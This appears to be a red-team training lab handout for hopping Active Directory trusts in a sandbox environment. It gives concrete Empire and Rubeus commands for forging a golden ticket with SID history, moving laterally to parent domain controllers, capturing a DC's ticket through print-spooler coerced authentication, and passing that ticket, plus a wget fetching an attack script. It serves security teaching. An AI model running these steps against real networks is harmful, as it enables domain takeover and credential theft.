Lab 4: Hopping Trusts - Parent Child and Tree-Root

In this lab we will be interacting with the agent we spawned in Lab 3 on the domain controller of sandbox. Please refer to Lab 3 if you have no agents to get instructions on how to spawn a new one.

In this lab you will:

• Use the krbtgt hash obtained in lab 3 to create a golden ticket with SID history

• laterally move to the domain controller of pwnzone

• use Rubeus monitor mode to monitor for incoming TGTs

• use coerced authentication through the print spooler service to trigger an authentication from treasureisland to pwnzone

• import the KRBTGT of the DC of treasureisland

• laterally move to the treasureisland DC

---

1. Now that we have the KRBTGT hash of sandbox.pwnzone.lab, we will also need the SID of pwnzone.lab. We can get the SID of the domain by enumerating domain trusts, which is a built-in post exploitation module in Empire. Interact with the agent that you have running as svc_entrypoint and select the following post exploitation module: powershell_situational_awareness_network_powerview_get_domain_trust set the API parameter to "true"

   
2. Take note of the SID of pwnzone.lab, we will need this for our next step.

replace the sections between <> with relevant parameters from previous steps.

1. Time to create a golden ticket with SID history, in your agent we will have to use Rubeus once again csharp_assembly_assembly file: select rubeus from the dropdown list parameters: golden /aes256: <replace with krbtgt aes256 hash> /user:administrator /domain:sandbox.pwnzone.lab /ldap /sids:<replace with sid of pwnzonelab>-519 /newpac /ptt

1. If everything went smoothly, we should see a successful ticket import in our tasks tab output from our last command.

   
2. With the new ticket imported, we can now laterally move to the domain controller of pwnzone.lab. In our Empire agent's interact tab select powershell_lateral_movement_invoke_psremoting listener: <select from dropdown> computername: pwnzone-dc01.pwnzone.lab

1. Repeat step 5, as we will need 2 agents on the parent domain controller for later exploitation.

2. You now have 2 new agents on the parent domain controller, it's time to hop to our treasureisland domain. on one of your 2 agents we will run Rubeus in monitoring mode, on the other one we will need to coerce authentication. Before we do that, we will need one more tool. Open up a terminal and type the following command: wget -O Invoke-SpoolSample.ps1 https://raw.githubusercontent.com/jfmaes/SEC565-Tools/refs/heads/main/Invoke-SpoolSample.ps1 keep note of the file location where you saved the Invoke-SpoolSample.ps1 as you will need this in a few moments.

the runfor parameter indicates how much time you have to trigger the coerced authentication. If you need more time than 2 minutes (120 seconds) to switch agents and execute the coerce attack, feel free to increase the runfor timer. Do note that you will not be able to open the output until the timer is expired, so don't set it too high either!

1. In one of your Empire agents (keep note which one), run Rubeus in monitoring mode: csharp_assembly_assembly file: select rubeus from the dropdown list parameters:

   monitor /targetuser:treasure-dc01$ /interval:2 /runfor:120 /consoleoutfile:C:\Users\Public\ticket.txt /nowrap

2. In your other empire agent on the DC run the coerced authentication attack:

   

3. Check the output tab to see if the coerced authentication was triggered:

   
4. Go to the File Browser tab and navigate to C:\Users\Public\ticket.txt - right click and select download.

1. Check your empire server terminal window for information on your download. If you see download errors, that means that Rubeus is still in monitor mode and therefore the file is currently locked. You will have to wait a few more seconds (or however long you put your runfor parameter) until Rubeus is done.

   
2. open up a new terminal window and navigate to the location that is displayed by your empire logs cd <your location of ticket.txt>

3. cat the output, it will look similar to this

1. copy the base64 encoded ticket (starts with do, ends with ==)

2. In your agent interact window, once again leverage Rubeus to pass the ticket. csharp_assembly_assembly File: select Rubeus from dropdown Parameters: ptt /ticket:<your base64 encoded ticket>

1. Check the output window to see if the ticket got imported successfully

This is as far as we can go in the lab, perhaps you can figure out how to get to treasureisland? ;) Hope you had fun, feel free to keep exploring and hope to see you in SEC565 at some point in the future :D